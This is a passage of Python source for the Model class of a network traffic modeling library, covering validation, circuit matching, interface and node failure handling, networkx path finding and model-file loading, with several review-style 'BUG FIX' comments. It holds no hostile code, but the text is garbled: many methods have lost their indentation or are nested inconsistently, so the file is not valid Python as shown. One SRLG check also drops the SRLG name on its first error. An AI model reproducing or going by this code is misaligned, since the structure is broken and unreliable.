        self.node_objects = self.node_objects.union(new_node_objects)
        self.interface_objects = \
            self.interface_objects.union(new_interface_objects)
        self.validate_model()
    def validate_model(self):
        """
        Validates that data fed into the model creates a valid network model

        Runs a series of checks (circuit matching, reserved bandwidth,
        duplicate interfaces/nodes, mismatched circuit capacities, multiple
        links between nodes, SRLG membership) and raises ModelException with
        the collected error data if any check fails; returns self otherwise.
        """
        # create circuits table, flags ints that are not part of a circuit
        circuits = self._make_circuits(return_exception=True)
        # Make dict to hold interface data, each entry has the following
        # format:
        # {'lsps': [], 'reserved_bandwidth': 0}
        int_info = self._make_int_info_dict()
        # Interface reserved bandwidth error sets
        int_res_bw_too_high = set([])
        int_res_bw_sum_error = set([])
        error_data = [] # list of all errored checks
        for interface in (interface for interface in self.interface_objects): # pragma: no cover
            self._reserved_bw_error_checks(int_info, int_res_bw_sum_error, int_res_bw_too_high, interface)
        # If creation of circuits returns a dict, there are problems
        if isinstance(circuits, dict): # pragma: no cover
            error_data.append({'ints_w_no_remote_int': circuits['data']})
        # Append any failed checks to error_data
        if len(int_res_bw_too_high) > 0: # pragma: no cover
            error_data.append({'int_res_bw_too_high': int_res_bw_too_high})
        if len(int_res_bw_sum_error) > 0: # pragma: no cover
            error_data.append({'int_res_bw_sum_error': int_res_bw_sum_error})
        # Validate there are no duplicate interfaces
        unique_interfaces_per_node = self._unique_interface_per_node()
        # Log any duplicate interfaces on a node
        if not unique_interfaces_per_node: # pragma: no cover
            error_data.append(unique_interfaces_per_node)
        # Make validate_model() check for matching failed statuses
        # on the interfaces and matching interface capacity
        circuits_with_mismatched_interface_capacity = []
        for ckt in (ckt for ckt in self.circuit_objects):
            self._validate_circuit_interface_capacity(circuits_with_mismatched_interface_capacity, ckt)
        if len(circuits_with_mismatched_interface_capacity) > 0:
            int_status_error_dict = {
                'circuits_with_mismatched_interface_capacity':
                circuits_with_mismatched_interface_capacity
            }
            error_data.append(int_status_error_dict)
        # Look for multiple links between nodes (not allowed in Model)
        if len(self.multiple_links_between_nodes()) > 0:
            multiple_links_between_nodes = {}
            multiple_links_between_nodes['multiple links between nodes detected; not allowed in Model object'
                                         '(use Parallel_Link_Model)'] = self.multiple_links_between_nodes()
            error_data.append(multiple_links_between_nodes)
        srlg_errors = self.validate_srlg_nodes()
        if len(srlg_errors) > 0:
            error_data.append(srlg_errors)
        # Verify no duplicate nodes
        node_names = set([node.name for node in self.node_objects])
        if (len(self.node_objects)) != (len(node_names)): # pragma: no cover
            node_dict = {'len_node_objects': len(self.node_objects),
                         'len_node_names': len(node_names)}
            error_data.append(node_dict)
        # Read error_data
        if len(error_data) > 0:
            message = 'network interface validation failed, see returned data'
            pprint(message)
            pprint(error_data)
            raise ModelException((message, error_data))
        else:
            # All checks passed; return self so calls can be chained
            return self
def validate_srlg_nodes(self):
"""
Validate that Nodes in each SRLG have the SRLG in their srlgs set.
srlg_errors is a dict of node names as keys and a list of SRLGs that node is
a member of in the model but that the SRLG is not in node.srlgs
:return: dict where keys are Node names and values are lists of SRLG names;
each value will be a single list of SRLG names missing that Node in the
SRLG node set
"""
srlg_errors = {}
for srlg in self.srlg_objects: # pragma: no cover # noqa # TODO - perhaps cover this later in unit testing
nodes_in_srlg_but_srlg_not_in_node_srlgs = [node for node in srlg.node_objects if srlg not in node.srlgs]
for node in nodes_in_srlg_but_srlg_not_in_node_srlgs:
try:
srlg_errors[node.name].append(srlg.name)
except KeyError:
srlg_errors[node.name] = []
return srlg_errors
    def update_simulation(self):
        """
        Updates the simulation state; this needs to be run any time there is
        a change to the state of the Model, such as failing an interface, adding
        a Demand, adding/removing and LSP, etc.
        This call does not carry forward any state from the previous simulation
        results.
        """
        self._parallel_lsp_groups = {} # Reset the attribute
        # This set of interfaces can be used to route traffic
        non_failed_interfaces = set()
        # This set of nodes can be used to route traffic
        available_nodes = set()
        # Find all the non-failed interfaces in the model and
        # add them to non_failed_interfaces.
        # If the interface is not failed, then by definition, the nodes are
        # not failed
        for interface_object in (interface_object for interface_object in self.interface_objects
                                 if interface_object.failed is not True):
            non_failed_interfaces.add(interface_object)
            available_nodes.add(interface_object.node_object)
            available_nodes.add(interface_object.remote_node_object)
        # Create a model consisting only of the non-failed interfaces and
        # corresponding non-failed (available) nodes
        non_failed_interfaces_model = Model(non_failed_interfaces,
                                            available_nodes, self.demand_objects,
                                            self.rsvp_lsp_objects)
        # Reset the reserved_bandwidth, traffic on each interface
        # (they are recomputed from scratch by the routing calls below)
        for interface in (interface for interface in self.interface_objects):
            interface.reserved_bandwidth = 0
            interface.traffic = 0
        for lsp in (lsp for lsp in self.rsvp_lsp_objects):
            lsp.path = 'Unrouted'
        for demand in (demand for demand in self.demand_objects):
            demand.path = 'Unrouted'
        print("Routing the LSPs . . . ")
        # Route the RSVP LSPs; LSPs are routed before demands so demands can
        # ride the LSPs where applicable
        self = self._route_lsps(non_failed_interfaces_model)
        print("LSPs routed (if present); routing demands now . . .")
        # Route the demands
        self = self._route_demands(self.demand_objects,
                                   non_failed_interfaces_model)
        print("Demands routed; validating model . . . ")
        self.validate_model()
    def _make_circuits(self, return_exception=True, include_failed_circuits=True):
        """
        Matches interface objects into circuits and returns the circuits list

        :param return_exception: Should an exception be returned if not all the
        interfaces can be matched into a circuit?
        :param include_failed_circuits: Should circuits that will be in a
        failed state be created?

        :return: a set of Circuit objects in the Model, each Circuit
        comprised of two Interface objects

        NOTE(review): on the success path this method stores the circuits on
        self.circuit_objects and returns None implicitly; it only returns a
        value ({'data': ...}) when unmatched interfaces exist and
        return_exception is False.
        """
        # Directed graph of the model; an edge pair (A->B and B->A) marks a
        # matchable circuit
        G = self._make_weighted_network_graph(include_failed_circuits=include_failed_circuits)
        # Determine which interfaces pair up into good circuits in G
        paired_interfaces = ((local_node_name, remote_node_name, data) for
                             (local_node_name, remote_node_name, data) in
                             G.edges(data=True) if G.has_edge(remote_node_name,
                                                              local_node_name))
        # Set interface object in_ckt = False and baseline the circuit_id
        for interface in (interface for interface in self.interface_objects):
            interface.in_ckt = False
        circuit_id_number = 1
        circuits = set([])
        # Using the paired interfaces (source_node, dest_node) pairs from G,
        # get the corresponding interface objects from the model to create
        # the circuit object
        for interface in (interface for interface in paired_interfaces):
            # Get each interface from model for each
            int1 = self.get_interface_object_from_nodes(interface[0],
                                                        interface[1])
            int2 = self.get_interface_object_from_nodes(interface[1],
                                                        interface[0])
            if int1.in_ckt is False and int2.in_ckt is False:
                # Mark interface objects as in_ckt = True
                int1.in_ckt = True
                int2.in_ckt = True
                # Add circuit_id to interface objects
                int1.circuit_id = circuit_id_number
                int2.circuit_id = circuit_id_number
                circuit_id_number = circuit_id_number + 1
                ckt = Circuit(int1, int2)
                circuits.add(ckt)
        # Find any interfaces that don't have counterpart
        exception_ints_not_in_ckt = [(local_node_name, remote_node_name, data)
                                     for (local_node_name, remote_node_name, data) in
                                     G.edges(data=True) if not (G.has_edge(remote_node_name, local_node_name))]
        if len(exception_ints_not_in_ckt) > 0:
            exception_msg = ('WARNING: These interfaces were not matched '
                             'into a circuit {}'.format(exception_ints_not_in_ckt))
            if return_exception:
                raise ModelException(exception_msg)
            else:
                return {'data': exception_ints_not_in_ckt}
        self.circuit_objects = circuits
def get_interface_object_from_nodes(self, local_node_name, remote_node_name):
"""Returns an Interface object with the specified local and
remote node names """
for interface in (interface for interface in self.interface_objects):
if interface.node_object.name == local_node_name and \
interface.remote_node_object.name == remote_node_name:
return interface
    def add_circuit(self, node_a_object, node_b_object, node_a_interface_name,
                    node_b_interface_name, cost_intf_a=1, cost_intf_b=1,
                    capacity=1000, failed=False, circuit_id=None):
        """
        Creates component Interface objects for a new Circuit in the Model.
        The Circuit object will then be created during the validate_model() call.

        :param node_a_object: Node object
        :param node_b_object: Node object
        :param node_a_interface_name: name of component Interface on node_a
        :param node_b_interface_name: name of component Interface on node_b
        :param cost_intf_a: metric/cost of node_a_interface component Interface
        :param cost_intf_b: metric/cost of node_b_interface component Interface
        :param capacity: Circuit's capacity
        :param failed: Should the Circuit be created in a Failed state?
        :param circuit_id: Optional.  Will be auto-assigned unless specified
        :return: Model with new Circuit comprised of 2 new Interfaces
        """
        # Auto-assign the circuit_id as (highest existing id + 1)
        if circuit_id is None:
            circuit_ids = self.all_interface_circuit_ids
            if len(circuit_ids) == 0:
                circuit_id = 1
            else:
                circuit_id = max(circuit_ids) + 1
        # Both component interfaces share the capacity and circuit_id
        int_a = Interface(node_a_interface_name, cost_intf_a, capacity,
                          node_a_object, node_b_object, circuit_id)
        int_b = Interface(node_b_interface_name, cost_intf_b, capacity,
                          node_b_object, node_a_object, circuit_id)
        # Reject duplicates of an existing (name, node) interface key
        existing_int_keys = set([interface._key for interface in self.interface_objects])
        if int_a._key in existing_int_keys:
            raise ModelException("interface {} on node {} already exists in model".format(int_a, node_a_object))
        elif int_b._key in existing_int_keys:
            raise ModelException("interface {} on node {} already exists in model".format(int_b, node_b_object))
        self.interface_objects.add(int_a)
        self.interface_objects.add(int_b)
        # validate_model() matches the two interfaces into a Circuit
        self.validate_model()
def is_node_an_orphan(self, node_object):
"""Determines if a node is in orphan_nodes"""
if node_object in self.get_orphan_node_objects():
return True
else:
return False
def get_orphan_node_objects(self):
"""
Returns list of Nodes that have no interfaces
"""
orphan_nodes = [node for node in self.node_objects if len(node.interfaces(self)) == 0]
return orphan_nodes
def add_node(self, node_object):
"""
Adds a node object to the model object
"""
if node_object.name in (node.name for node in self.node_objects):
message = "A node with name {} already exists in the model".format(node_object.name)
raise ModelException(message)
else:
self.node_objects.add(node_object)
self.validate_model()
def get_node_object(self, node_name):
"""
Returns a Node object, given a node's name
"""
matching_node = [node for node in self.node_objects if node.name == node_name]
if len(matching_node) > 0:
return matching_node[0]
else:
message = "No node with name %s exists in the model" % node_name
raise ModelException(message)
def _make_network_interfaces(self, interface_info_list):
"""
Returns set of Interface objects and a set of Node objects for Nodes
that are not already in the Model.
:param interface_info_list: list of dicts with interface specs;
:return: Set of Interface objects and set of Node objects for the
new Interfaces for Nodes that are not already in the model
"""
network_interface_objects = set([])
network_node_objects = set([])
# Create the Interface objects
for interface in interface_info_list:
intf = Interface(interface['name'], interface['cost'],
interface['capacity'], Node(interface['node']),
Node(interface['remote_node']),
interface['circuit_id'])
network_interface_objects.add(intf)
# Check to see if the Interface's Node already exists, if not, add it
node_names = ([node.name for node in self.node_objects])
if interface['node'] not in node_names:
network_node_objects.add(Node(interface['node']))
if interface['remote_node'] not in node_names:
network_node_objects.add(Node(interface['remote_node']))
return (network_interface_objects, network_node_objects)
def add_rsvp_lsp(self, source_node_name, dest_node_name, name):
"""
Adds an RSVP LSP with name from the source node to the
dest node and validates model.
:param source_node_name: LSP source Node name
:param dest_node_name: LSP destination Node name
:param name: name of LSP
:return: A validated Model with the new RSVP_LSP object
"""
source_node_object = self.get_node_object(source_node_name)
dest_node_object = self.get_node_object(dest_node_name)
added_lsp = RSVP_LSP(source_node_object, dest_node_object, name)
if added_lsp._key in set([lsp._key for lsp in self.rsvp_lsp_objects]):
message = '{} already exists in rsvp_lsp_objects'.format(added_lsp)
raise ModelException(message)
self.rsvp_lsp_objects.add(added_lsp)
self.validate_model()
def get_demand_object(self, source_node_name, dest_node_name, demand_name='none'):
    """
    Returns demand specified by the source_node_name, dest_node_name, name;
    throws exception if demand not found
    """
    # Return the first demand whose (source, dest, name) triple matches
    for candidate in self.demand_objects:
        if (candidate.source_node_object.name == source_node_name
                and candidate.dest_node_object.name == dest_node_name
                and candidate.name == demand_name):
            return candidate
    raise ModelException('no matching demand')
def get_rsvp_lsp(self, source_node_name, dest_node_name, lsp_name='none'):
    """
    Returns the RSVP LSP from the model with the specified source node
    name, dest node name, and LSP name.

    :param source_node_name: name of source node for LSP
    :param dest_node_name: name of destination node for LSP
    :param lsp_name: name of LSP
    :return: RSVP_LSP object
    :raises ModelException: if no LSP with the given key exists in the model
    """
    needed_key = (source_node_name, dest_node_name, lsp_name)

    # PERF FIX: single pass over rsvp_lsp_objects; the original iterated the
    # collection twice (one membership test, then one fetch loop)
    for lsp in self.rsvp_lsp_objects:
        if lsp._key == needed_key:
            return lsp

    msg = ("LSP with source node %s, dest node %s, and name %s "
           "does not exist in model" % (source_node_name, dest_node_name, lsp_name))
    raise ModelException(msg)
# Interface calls
def get_interface_object(self, interface_name, node_name):
    """Returns an interface object for specified node name and interface name"""
    # Raises ModelException when the interface is not in the model
    self._does_interface_exist(interface_name, node_name)
    node_object = self.get_node_object(node_name)
    matching = [intf for intf in node_object.interfaces(self)
                if intf.name == interface_name]
    return matching[0]
def _does_interface_exist(self, interface_name, node_object_name):
int_key = (interface_name, node_object_name)
interface_key_iterator = (interface._key for interface in
self.interface_objects)
if int_key not in (interface_key_iterator):
raise ModelException('specified interface does not exist')
def get_circuit_object_from_interface(self, interface_name, node_name):
    """
    Returns a Circuit object, given a Node name and Interface name
    """
    # Validate the interface exists before looking for its circuit
    self._does_interface_exist(interface_name, node_name)
    interface = self.get_interface_object(interface_name, node_name)
    matching_circuits = [circuit for circuit in self.circuit_objects
                         if interface in (circuit.interface_a, circuit.interface_b)]
    return matching_circuits[0]
# Convenience calls #####
def get_failed_interface_objects(self):
    """
    Returns a list of all failed interfaces in the Model
    """
    return [interface for interface in self.interface_objects
            if interface.failed]
def get_unfailed_interface_objects(self):
    """
    Returns a set of all non-failed interfaces in the Model.

    (DOC FIX: previous docstring said 'list', but this call has always
    returned a set.)

    :return: set of Interface objects whose failed attribute is False
    """
    return {interface for interface in self.interface_objects
            if not interface.failed}
def get_unrouted_demand_objects(self):
    """
    Returns list of demand objects that cannot be routed
    """
    return [demand for demand in self.demand_objects
            if demand.path == "Unrouted"]
def change_interface_name(self, node_name,
                          current_interface_name,
                          new_interface_name):
    """Changes interface name"""
    # Look the Interface up, rename it in place, and hand it back
    renamed_interface = self.get_interface_object(current_interface_name, node_name)
    renamed_interface.name = new_interface_name
    return renamed_interface
def fail_interface(self, interface_name, node_name):
    """
    Fails the Interface object for the interface_name/node_name pair.

    :param interface_name: name of the Interface to fail
    :param node_name: name of the Node hosting the Interface
    :raises ModelException: if the interface does not exist in the model
    """
    # Get the interface object (raises ModelException if it does not exist)
    interface_object = self.get_interface_object(interface_name, node_name)

    # BUG FIX: the original instantiated ModelException here but never
    # raised it, making this guard a silent no-op
    if interface_object not in self.interface_objects:
        raise ModelException('specified interface does not exist')

    # An interface and its remote peer fail together (both sides of circuit)
    remote_interface_object = interface_object.get_remote_interface(self)
    remote_interface_object.failed = True
    interface_object.failed = True
def unfail_interface(self, interface_name, node_name, raise_exception=False):
    """
    Unfails the Interface object for the interface_name, node_name pair.

    :param interface_name: name of the Interface to unfail
    :param node_name: name of the Node hosting the Interface
    :param raise_exception: If raise_exception=True, an exception
                            will be raised if the interface cannot be unfailed.
                            An example of this would be if you tried to unfail
                            the interface when the parent node or remote node
                            was in a failed state
    :return: Interface object from Model that is not failed
    :raises ModelException: on bad raise_exception type, missing interface,
                            or (when raise_exception=True) failed endpoint node
    """
    if not (isinstance(raise_exception, bool)):
        message = "raise_exception must be boolean value"
        raise ModelException(message)

    # Get the interface object (raises ModelException if it does not exist)
    interface_object = self.get_interface_object(interface_name, node_name)

    # BUG FIX: the original instantiated ModelException here but never
    # raised it, making this guard a silent no-op
    if interface_object not in set(self.interface_objects):
        raise ModelException('specified interface does not exist')

    # Find the remote interface
    remote_interface = interface_object.get_remote_interface(self)

    # Only unfail when both endpoint Nodes are up; reset reserved_bandwidth
    # on both sides so RSVP accounting starts from a clean slate
    if self.get_node_object(interface_object.node_object.name).failed is False and \
            self.get_node_object(remote_interface.node_object.name).failed is False:
        remote_interface.failed = False
        remote_interface.reserved_bandwidth = 0
        interface_object.failed = False
        interface_object.reserved_bandwidth = 0
        self.validate_model()
    else:
        if raise_exception:
            message = ("Local and/or remote node are failed; cannot have "
                       "unfailed interface on failed node.")
            raise ModelException(message)
def get_all_paths_reservable_bw(self, source_node_name, dest_node_name, include_failed_circuits=True,
                                cutoff=10, needed_bw=0):
    """
    For a source and dest node name pair, find all simple path(s) with at
    least needed_bw reservable bandwidth available less than or equal to
    cutoff hops long.

    The amount of simple paths (paths that don't have repeating nodes) can
    be very large for larger topologies and so this call can be very expensive.
    Use the cutoff argument to limit the path length to consider to cut down on
    the time it takes to run this call.

    :param source_node_name: name of source node in path
    :param dest_node_name: name of destination node in path
    :param include_failed_circuits: include failed circuits in the topology
    :param needed_bw: the amount of reservable bandwidth required on the path
    :param cutoff: max amount of path hops
    :return: Return the path(s) in dictionary form:
             path = {'path': [list of all path routes]}
    """
    # Define a networkx DiGraph to find the path
    G = self._make_weighted_network_graph(include_failed_circuits=include_failed_circuits, needed_bw=needed_bw)

    # Define the Model-style path to be built
    converted_path = dict()
    converted_path['path'] = []

    # Find the simple paths in G between source and dest
    digraph_all_paths = nx.all_simple_paths(G, source_node_name, dest_node_name, cutoff=cutoff)

    # BUG FIX: catch Exception instead of BaseException so that
    # KeyboardInterrupt/SystemExit are not silently swallowed; any graph
    # lookup failure yields the (possibly empty) paths gathered so far
    try:
        for path in digraph_all_paths:
            model_path = self._convert_nx_path_to_model_path(path)
            converted_path['path'].append(model_path)
        return converted_path
    except Exception:
        return converted_path
def get_shortest_path(self, source_node_name, dest_node_name, needed_bw=0):
    """
    For a source and dest node name pair, find the shortest path(s) with at
    least needed_bw available.

    :param source_node_name: name of source node in path
    :param dest_node_name: name of destination node in path
    :param needed_bw: the amount of reservable bandwidth required on the path
    :return: Return the shortest path in dictionary form:
             shortest_path = {'path': [list of shortest path routes], 'cost': path_cost}
    """
    # Define a networkx DiGraph to find the path
    G = self._make_weighted_network_graph(include_failed_circuits=False, needed_bw=needed_bw)

    # Define the Model-style path to be built
    converted_path = dict()
    converted_path['path'] = []
    converted_path['cost'] = None

    # Find the shortest paths in G between source and dest
    digraph_shortest_paths = nx.all_shortest_paths(G, source_node_name,
                                                   dest_node_name,
                                                   weight='cost')

    # BUG FIX: catch Exception instead of BaseException so that
    # KeyboardInterrupt/SystemExit are not silently swallowed
    try:
        for path in digraph_shortest_paths:
            model_path = self._convert_nx_path_to_model_path(path)
            converted_path['path'].append(model_path)
            converted_path['cost'] = nx.shortest_path_length(G, source_node_name, dest_node_name, weight='cost')
        return converted_path
    except Exception:
        return converted_path
def get_shortest_path_for_routed_lsp(self, source_node_name, dest_node_name, lsp, needed_bw):
    """
    For a source and dest node name pair, find the shortest path(s) with at
    least needed_bw available for an LSP that is already routed.

    :param source_node_name: name of source node in path
    :param dest_node_name: name of destination node in path
    :param lsp: the currently-routed RSVP LSP being re-pathed
    :param needed_bw: reservable bandwidth required on the new path
    :return: Return the shortest path in dictionary form:
             shortest_path = {'path': [list of shortest path routes], 'cost': path_cost}
    """
    # Define a networkx DiGraph to find the path
    G = self._make_weighted_network_graph_routed_lsp(lsp, needed_bw=needed_bw)

    # Define the Model-style path to be built
    converted_path = dict()
    converted_path['path'] = []
    converted_path['cost'] = None

    # Find the shortest paths in G between source and dest
    digraph_shortest_paths = nx.all_shortest_paths(G, source_node_name,
                                                   dest_node_name,
                                                   weight='cost')

    # BUG FIX: catch Exception instead of BaseException so that
    # KeyboardInterrupt/SystemExit are not silently swallowed
    try:
        for path in digraph_shortest_paths:
            model_path = self._convert_nx_path_to_model_path(path)
            converted_path['path'].append(model_path)
            converted_path['cost'] = nx.shortest_path_length(G, source_node_name,
                                                             dest_node_name, weight='cost')
        return converted_path
    except Exception:
        return converted_path
def _convert_nx_path_to_model_path(self, nx_graph_path):
"""Given a path from an networkx DiGraph, converts that
path to a Model style path and returns that Model style path
A networkx path is a list of nodes in order of transit.
ex: ['A', 'B', 'G', 'D', 'F']
The corresponding model style path would be:
[Interface(name = 'A-to-B', cost = 20, capacity = 125, node_object = Node('A'),
remote_node_object = Node('B'), circuit_id = 9),
Interface(name = 'B-to-G', cost = 10, capacity = 100, node_object = Node('B'),
remote_node_object = Node('G'), circuit_id = 6),
Interface(name = 'G-to-D', cost = 10, capacity = 100, node_object = Node('G'),
remote_node_object = Node('D'), circuit_id = 2),
Interface(name = 'D-to-F', cost = 10, capacity = 300, node_object = Node('D'),
remote_node_object = Node('F'), circuit_id = 1)]
"""
# Define a model-style path to build
model_path = []
# look at each hop in the path
for hop in nx_graph_path:
current_hop_index = nx_graph_path.index(hop)
next_hop_index = current_hop_index + 1
if next_hop_index < len(nx_graph_path):
next_hop = nx_graph_path[next_hop_index]
interface = self.get_interface_object_from_nodes(hop, next_hop)
model_path.append(interface)
return model_path
# NODE CALLS ######
def get_node_interfaces(self, node_name):
    """Returns list of interfaces on specified node name"""
    target_node = Node(node_name)
    return target_node.interfaces(self)
def fail_node(self, node_name):
    """Fails specified node"""
    # Fail each of the node's interfaces first ...
    for interface in self.get_node_interfaces(node_name):
        self.fail_interface(interface.name, node_name)
    # ... then mark the node itself as failed
    self.get_node_object(node_name).failed = True
def unfail_node(self, node_name):
    """Unfails the Node with name=node_name"""
    # Mark the node itself as up first
    self.get_node_object(node_name).failed = False

    # Bring up each interface whose far-end node is also up
    for interface in self.get_node_interfaces(node_name):
        if interface.remote_node_object.failed:
            continue
        # Local side of the circuit
        self.unfail_interface(interface.name, node_name, False)
        # Remote side of the circuit
        remote_int = interface.get_remote_interface(self)
        self.unfail_interface(remote_int.name,
                              remote_int.node_object.name, False)
def get_failed_node_objects(self):
    """
    Returns a list of all failed nodes
    """
    return [self.get_node_object(node.name)
            for node in self.node_objects if node.failed]
def get_non_failed_node_objects(self):
    """Returns a list of all non-failed nodes.

    (DOC FIX: previous docstring said 'failed' nodes -- a copy/paste error;
    this call returns the nodes whose failed attribute is False.)
    """
    return [self.get_node_object(node.name)
            for node in self.node_objects if not node.failed]
# Display calls #########
def display_interface_status(self):  # pragma: no cover
    """Returns failed = True/False for each interface"""
    # Header row, 12-char columns
    print('Node'.ljust(12), 'Interface'.ljust(12), 'Remote Node'.ljust(12), 'Failed'.ljust(12))
    for interface in self.interface_objects:
        print(interface.node_object.name.ljust(12),
              interface.name.ljust(12),
              interface.remote_node_object.name.ljust(12),
              str(interface.failed).ljust(12))
def display_node_status(self):  # pragma: no cover
    """Returns failed = True/False for each node"""
    print('Node'.ljust(12), 'Failed'.ljust(12))
    for node in self.node_objects:
        print(node.name.ljust(12), str(node.failed).ljust(12))
def display_interfaces_traffic(self):  # pragma: no cover
    """
    A human-readable(-ish) display of interfaces and traffic on each
    """
    print('Node'.ljust(12), 'Interface'.ljust(12), 'Remote Node'.ljust(12), 'Traffic'.ljust(12))
    for interface in self.interface_objects:
        print(interface.node_object.name.ljust(12),
              interface.name.ljust(12),
              interface.remote_node_object.name.ljust(12),
              repr(interface.traffic).ljust(12))
def display_demand_paths(self):  # pragma: no cover
    """
    Displays each demand and its path(s) across the network
    """
    for demand in self.demand_objects:
        print('demand._key is', demand._key)
        print('Demand has %s paths:' % (len(demand.path)))
        for path in demand.path:
            pprint(path)
            print()
        # Blank separator lines between demands
        print()
        print()
def display_interface_objects(self):  # pragma: no cover
    """Displays interface objects in a more human readable manner"""
    for interface in self.interface_objects:
        pprint(interface)
        print()
def _make_weighted_network_graph(self, include_failed_circuits=True, needed_bw=0, rsvp_required=False):
    """
    Returns a weighted networkx digraph built from this Model object.

    :param include_failed_circuits: include interfaces from currently failed
                                    circuits in the graph?
    :param needed_bw: how much reservable_bandwidth is required?
    :param rsvp_required: True|False; only consider rsvp_enabled interfaces?
    :return: networkx digraph with edges that conform to the needed_bw and
             rsvp_required parameters
    """
    G = nx.DiGraph()

    def eligible(interface):
        # Must have enough reservable bandwidth...
        if interface.reservable_bandwidth < needed_bw:
            return False
        # ...must be up unless failed circuits are allowed...
        if not include_failed_circuits and interface.failed:
            return False
        # ...and must carry RSVP when requested
        if rsvp_required and interface.rsvp_enabled is not True:
            return False
        return True

    edge_names = ((interface.node_object.name,
                   interface.remote_node_object.name,
                   interface.cost)
                  for interface in self.interface_objects if eligible(interface))

    # Add edges to networkx DiGraph
    G.add_weighted_edges_from(edge_names, weight='cost')

    # Add all the nodes (including isolated ones)
    G.add_nodes_from(node.name for node in self.node_objects)
    return G
def _make_weighted_network_graph_routed_lsp(self, lsp, needed_bw=0):
    """
    Looks for a new path with needed_bw reservable bandwidth for an RSVP LSP
    that is currently routed.

    Builds and returns a weighted networkx DiGraph from this Model.
    Considers edges with needed_bw of reservable_bandwidth, crediting back
    the bandwidth the lsp itself reserves on Interfaces in its existing path.

    :param lsp: RSVP LSP that is currently routed
    :param needed_bw: how much bandwidth is needed for the RSVP LSP's new path
    :return: networkx DiGraph with eligible edges
    """
    G = nx.DiGraph()

    # Interfaces the lsp currently transits; these get the lsp's own
    # reserved bandwidth credited back when testing headroom
    lsp_path_interfaces = lsp.path['interfaces']

    eligible_edges = []
    for interface in self.interface_objects:
        # Routed LSPs can only use interfaces that are up and RSVP-enabled
        if interface.failed is not False or interface.rsvp_enabled is not True:
            continue
        headroom = interface.reservable_bandwidth
        if interface in lsp_path_interfaces:
            headroom += lsp.reserved_bandwidth
        if headroom >= needed_bw:
            eligible_edges.append((interface.node_object.name,
                                   interface.remote_node_object.name,
                                   interface.cost))

    # Add edges to networkx DiGraph
    G.add_weighted_edges_from(eligible_edges, weight='cost')

    # Add all the nodes (including isolated ones)
    G.add_nodes_from(node.name for node in self.node_objects)
    return G
@classmethod
def load_model_file(cls, data_file):  # TODO - make sure doc strings for this come out well in docs dir
    """
    Opens a network_modeling data file and returns a model containing
    the info in the data file. The data file must be of the appropriate
    format to produce a valid model. This cannot be used to open
    multiple models in a single python instance - there may be
    unpredictable results in the info in the models.

    The format for the file must be a tab separated value file.

    This docstring you are reading may not display the table info
    explanations/examples below correctly on https://pyntm.readthedocs.io/en/latest/api.html.
    Recommend either using help(Model.load_model_file) at the python3 cli or
    looking at one of the sample model data_files in github:
    https://github.com/tim-fiola/network_traffic_modeler_py3/blob/master/examples/sample_network_model_file.csv
    https://github.com/tim-fiola/network_traffic_modeler_py3/blob/master/examples/lsp_model_test_file.csv

    The following headers must exist, with the following tab-column
    names beneath:

    INTERFACES_TABLE
    node_object_name - name of node where interface resides
    remote_node_object_name - name of remote node
    name - interface name
    cost - IGP cost/metric for interface
    capacity - capacity
    rsvp_enabled (optional) - is interface allowed to carry RSVP LSPs? True|False; default is True
    percent_reservable_bandwidth (optional) - percent of capacity allowed to be reserved by RSVP LSPs; this
    value should be given as a percentage value - ie 80% would be given as 80, NOT .80. Default is 100

    Note - The existence of Nodes will be inferred from the INTERFACES_TABLE.
    So a Node created from an Interface does not have to appear in the
    NODES_TABLE unless you want to add additional attributes for the Node
    such as latitude/longitude

    NODES_TABLE -
    name - name of node
    lon - longitude (or y-coordinate)
    lat - latitude (or x-coordinate)

    Note - The NODES_TABLE is present for 2 reasons:
    - to add a Node that has no interfaces
    - and/or to add additional attributes for a Node inferred from
    the INTERFACES_TABLE

    DEMANDS_TABLE
    source - source node name
    dest - destination node name
    traffic - amount of traffic on demand
    name - name of demand

    RSVP_LSP_TABLE (this table is optional)
    source - source node name
    dest - destination node name
    name - name of LSP
    configured_setup_bw - if LSP has a fixed, static configured setup bandwidth, place that static value here,
    if LSP is auto-bandwidth, then leave this blank for the LSP

    Functional model files can be found in this directory in
    https://github.com/tim-fiola/network_traffic_modeler_py3/tree/master/examples

    Here is an example of a data file:

        INTERFACES_TABLE
        node_object_name remote_node_object_name name cost capacity rsvp_enabled percent_reservable_bandwidth # noqa E501
        A B A-to-B 4 100
        B A B-to-A 4 100

        NODES_TABLE
        name lon lat
        A 50 0
        B 0 -50

        DEMANDS_TABLE
        source dest traffic name
        A B 80 dmd_a_b_1

        RSVP_LSP_TABLE
        source dest name configured_setup_bw
        A B lsp_a_b_1 10
        A B lsp_a_b_2

    :param data_file: file with model info
    :return: Model object
    """
    # TODO - allow user to add user-defined columns in NODES_TABLE and add that as an attribute to the Node
    # TODO - add support for SRLGs

    # Accumulators for the four object families parsed from the file
    interface_set = set()
    node_set = set()
    demand_set = set()
    lsp_set = set()

    # Open the file with the data, read it, and split it into lines
    with open(data_file, 'r') as f:
        data = f.read()
    lines = data.splitlines()

    # Define the Interfaces from the data and extract the presence of
    # Nodes from the Interface data.
    # NOTE: section boundaries are located by index arithmetic --
    # each table header is expected 3 lines after the previous section's
    # end (blank line + header + column-name line).
    int_info_begin_index = 2
    int_info_end_index = find_end_index(int_info_begin_index, lines)
    interface_set, node_set = cls._extract_interface_data_and_implied_nodes(int_info_begin_index,
                                                                            int_info_end_index, lines)

    # Define the explicit nodes info from the file
    nodes_info_begin_index = int_info_end_index + 3
    nodes_info_end_index = find_end_index(nodes_info_begin_index, lines)
    node_lines = lines[nodes_info_begin_index:nodes_info_end_index]
    for node_line in node_lines:
        cls._add_node_from_data(demand_set, interface_set, lines, lsp_set, node_line, node_set)

    # Define the demands info
    demands_info_begin_index = nodes_info_end_index + 3
    demands_info_end_index = find_end_index(demands_info_begin_index, lines)
    # There may or may not be LSPs in the model, so if there are not,
    # set the demands_info_end_index as the last line in the file
    if not demands_info_end_index:
        demands_info_end_index = len(lines)

    demands_lines = lines[demands_info_begin_index:demands_info_end_index]

    for demand_line in demands_lines:
        try:
            cls._add_demand_from_data(demand_line, demand_set, lines, node_set)
        except ModelException as e:
            # Re-raise with just the message payload from the helper
            err_msg = e.args[0]
            raise ModelException(err_msg)

    # Define the LSP info (if present)
    # If the demands_info_end_index is the same as the length of the
    # lines list, then there is no LSP section
    if demands_info_end_index != len(lines):
        try:
            cls._add_lsp_from_data(demands_info_end_index, lines, lsp_set, node_set)
        except ModelException as e:
            err_msg = e.args[0]
            raise ModelException(err_msg)

    return cls(interface_set, node_set, demand_set, lsp_set)
@classmethod
def _extract_interface_data_and_implied_nodes(cls, int_info_begin_index, int_info_end_index, lines):
